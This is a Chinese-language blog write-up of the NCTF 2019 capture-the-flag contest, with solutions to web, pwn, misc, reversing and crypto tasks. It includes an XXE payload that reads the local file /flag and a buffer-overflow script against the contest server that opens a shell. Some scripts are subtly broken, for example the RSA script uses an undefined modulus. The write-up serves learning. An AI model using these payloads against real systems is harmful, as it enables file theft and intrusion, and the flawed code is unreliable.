NCTF 2019 WriteUp

怎么说呢，今天换了新的博客主题，我也想从现在开始写博客了，毕竟都鸽了一年了，
上周末南邮CTF开赛，我也就去划了个水，怎么说呢，只能感觉自己太弱了…

下面就是几个我做出来的题的题解，望指正。

Web

Fake XML cookbook

给了在/flag里，然后XML注入。

<!DOCTYPE a [
<!ENTITY flag SYSTEM "file:///flag">
]>
<user>
  <username>&flag;</username>
  <password>111</password>
</user>

Pwn

hello_pwn

pwntools就行

import pwn
c = pwn.remote(“139.129.76.65”,50003)
c.recvall()

pwn me 100 years! (Ⅰ)

IDA分析
read溢出,所以

# python2
import pwn
c = pwn.remote("139.129.76.65",50004)
for _ in range(4):
c.readline()
c.sendline("yes\0"+"\0"*12+pwn.p32(1717986918))
c.interactive()

getshell后ls,cat flag

MISC

a_good_idea

binwalk分析图片

foremost还原，打开zip，解压

根据hint，StegSolve，两图分析，减时出二维码

扫描出flag

pip install

去pip库里下载一下pip包，然后看setup.py

base64解码，即可得flag

What’s this

wireshark追踪流，得到What1s7his.zip
打开zip，有密码，猜测为伪加密，改00 00 后解压得到txt
猜测每一行为base64加密，解密得
然后这题我就没做出来。

RE

DEBUG

IDA调试，出结果

签到

比较输入的字符串(flag)与内存中一块数组的值是否相等，总共49个方程，每7个一组，然后用z3解方程就行了

# python3
from z3 import *
arr =  [0x4884,0x91C4,0x7D35,0x81FE,0x5DB9,0x817F,0x3B90,0x3597,0x8559,0x6AFF,0x6FDF,0x4815,0x6F31,0x3060,0x512C,0x0B01D,0x8BF3,0x917B,0x65B5,0x99F1,0x44AF,0x5159,0x0ADBA,0x8942,0x9032,0x653E,0x9803,0x4508,0x52E3,0x0AB9F,0x90D0,0x99BF,0x6C91,0x0A1E7,0x46B2,0x5357,0x0B454,0x972A,0x98AC,0x7215,0x9FD1,0x4AAD,0x551A,0x0B5ED,0x95B2,0x0A039,0x7272,0x0A991,0x4CC7,0x0F]
a1 = [BitVec('a%d' % i, 8) for i in range(49)]
solver = Solver()
for i in range(0,49,7):
    j = 7*int(i/7)
    solver.add(34 * a1[i+3] + 12 * a1[i+0] + 53 * a1[i+1] + 6 * a1[i+2] + 58 * a1[i+4] + 36 * a1[i+5] + a1[i+6] == arr[j])
    solver.add(27 * a1[i+4] + 73 * a1[i+3] + 12 * a1[i+2] + 83 * a1[i+0] + 85 * a1[i+1] + 96 * a1[i+5] + 52 * a1[i+6] == arr[j +1])
    solver.add(24 * a1[i+2] + 78 * a1[i+0] + 53 * a1[i+1] + 36 * a1[i+3] + 86 * a1[i+4] + 25 * a1[i+5] + 46 * a1[i+6] == arr[j +2])
    solver.add(78 * a1[i+1] + 39 * a1[i+0] + 52 * a1[i+2] + 9 * a1[i+3] + 62 * a1[i+4] + 37 * a1[i+5] + 84 * a1[i+6] == arr[j +3])
    solver.add(48 * a1[i+4] + 6 * a1[i+1] + 23 * a1[i+0] + 14 * a1[i+2] + 74 * a1[i+3] + 12 * a1[i+5] + 83 * a1[i+6] == arr[j +4])
    solver.add(15 * a1[i+5] + 48 * a1[i+4] + 92 * a1[i+2] + 85 * a1[i+1] + 27 * a1[i+0] + 42 * a1[i+3] + 72 * a1[i+6] == arr[j +5])
    solver.add(26 * a1[i+5] + 67 * a1[i+3] + 6 * a1[i+1] + 4 * a1[i+0] + 3 * a1[i+2] + 68 * a1[i+6] == arr[j +6])
if solver.check() != sat:
    raise RuntimeError()
m = solver.model()
# print(m)
flag = ''
for i in range(0,49):
    flag += chr(m[a1[i]].as_long().real)
print(flag)

Crypto

childRSA

yafu跑一下能出p,q，然后phin，e给定，d能求出来，然后都出来了。

# python2
from Crypto.Util.number import inverse
p = 178449493212694205742332078583256205058672290603652616240227340638730811945224947826121772642204629335108873832781921390308501763661154638696935732709724016546955977529088135995838497476350749621442719690722226913635772410880516639651363626821442456779009699333452616953193799328647446968707045304702547915799734431818800374360377292309248361548868909066895474518333089446581763425755389837072166970684877011663234978631869703859541876049132713490090720408351108387971577438951727337962368478059295446047962510687695047494480605473377173021467764495541590394732685140829152761532035790187269724703444386838656193674253139
q = 184084121540115307597161367011014142898823526027674354555037785878481711602257307508985022577801782788769786800015984410443717799994642236194840684557538917849420967360121509675348296203886340264385224150964642958965438801864306187503790100281099130863977710204660546799128755418521327290719635075221585824217487386227004673527292281536221958961760681032293340099395863194031788435142296085219594866635192464353365034089592414809332183882423461536123972873871477755949082223830049594561329457349537703926325152949582123419049073013144325689632055433283354999265193117288252918515308767016885678802217366700376654365502867
phin = (p-1)*(q-1)
e = 65537
d = inverse(e, phin)
c = 26308018356739853895382240109968894175166731283702927002165268998773708335216338997058314157717147131083296551313334042509806229853341488461087009955203854253313827608275460592785607739091992591431080342664081962030557042784864074533380701014585315663218783130162376176094773010478159362434331787279303302718098735574605469803801873109982473258207444342330633191849040553550708886593340770753064322410889048135425025715982196600650740987076486540674090923181664281515197679745907830107684777248532278645343716263686014941081417914622724906314960249945105011301731247324601620886782967217339340393853616450077105125391982689986178342417223392217085276465471102737594719932347242482670320801063191869471318313514407997326350065187904154229557706351355052446027159972546737213451422978211055778164578782156428466626894026103053360431281644645515155471301826844754338802352846095293421718249819728205538534652212984831283642472071669494851823123552827380737798609829706225744376667082534026874483482483127491533474306552210039386256062116345785870668331513725792053302188276682550672663353937781055621860101624242216671635824311412793495965628876036344731733142759495348248970313655381407241457118743532311394697763283681852908564387282605279108
m = pow(c,d,n)
print hex(m)[2:-1].decode("hex")

LCG

只能说我太弱了

# python3
from Crypto.Util.number import inverse, isPrime
from math import gcd
import hashlib
import pwn

def PoW(prefix, digest):
    prefix = bytes.fromhex(prefix)
    for i in range(256**3):
        guess = prefix + i.to_bytes(3, 'big')
        if hashlib.sha256(guess).hexdigest() == digest:
            return guess.hex()
            break
    else:
        pass

if __name__ == "__main__":
    c = pwn.remote("139.129.76.65", 60001)
    for _ in range(8):
        c.readline()
    digest = c.readline().decode().split(" ")[-1][:-1]
    prefix = c.readline().decode().split(" ")[-1][:-1]
    c.sendline(PoW(prefix,digest))
    for _ in range(18):
        c.readline()
    # Challenge 1
    N = eval(c.readline().decode().split(" ")[-1]) # N
    a = eval(c.readline().decode().split(" ")[-1]) # a
    b = eval(c.readline().decode().split(" ")[-1]) # b
    st = eval(c.readline().decode().split(" ")[-1]) # st
    a_1 = inverse(a, N)
    seed = (st - b) * a_1 % N
    c.sendline(str(seed))
    for _ in range(6):
        c.readline()
    # Challenge 2
    N = eval(c.readline().decode().split(" ")[-1]) # N
    a = eval(c.readline().decode().split(" ")[-1]) # a
    st1 = eval(c.readline().decode().split(" ")[-1]) # st1
    st2 = eval(c.readline().decode().split(" ")[-1]) # st2
    b = (st2 - a * st1) % N
    a_1 = inverse(a, N)
    seed = (st1 - b) * a_1 % N
    c.sendline(str(seed))
    for _ in range(5):
        c.readline()
    # Challenge 3
    N = eval(c.readline().decode().split(" ")[-1]) # N
    st1 = eval(c.readline().decode().split(" ")[-1]) # st1
    st2 = eval(c.readline().decode().split(" ")[-1]) # st2
    st3 = eval(c.readline().decode().split(" ")[-1]) # st3
    a = (st3 - st2) * inverse(st2 - st1, N)
    b = (st2 - a * st1) % N
    a_1 = inverse(a, N)
    seed = (st1 - b) * a_1 % N
    c.sendline(str(seed))
    for _ in range(5):
        c.readline()
    # Challenge 4
    # 大概思路就是用两个一组，然后gcd出N，之后就可以了
    st1 = eval(c.readline().decode().split(" ")[-1]) # st1
    st2 = eval(c.readline().decode().split(" ")[-1]) # st2
    st3 = eval(c.readline().decode().split(" ")[-1]) # st3
    st4 = eval(c.readline().decode().split(" ")[-1]) # st4
    st5 = eval(c.readline().decode().split(" ")[-1]) # st5
    st6 = eval(c.readline().decode().split(" ")[-1]) # st6
    # t = (st1,st2,st3,st4,st5,st6)
    # print(list(t))
    g1 = (st5 - st4) * (st4 - st3) - (st6 - st5) * (st3 - st2)
    g2 = (st6 - st4) * (st4 - st2) - (st5 - st3) * (st5 - st3)
    N = gcd(g1, g2)
    print(N)
    for i in range(1, 100):
        if N % i == 0:
            N = N // i
    print(isPrime(N))
    if isPrime(N) and len(bin(N)) == 258:
        a = (st3 - st2) * inverse(st2 - st1, N)
        b = (st2 - a * st1) % N
        a_1 = inverse(a, N)
        seed = (st1 - b) * a_1 % N
        c.sendline(str(seed))
    c.interactive()

然后得到flag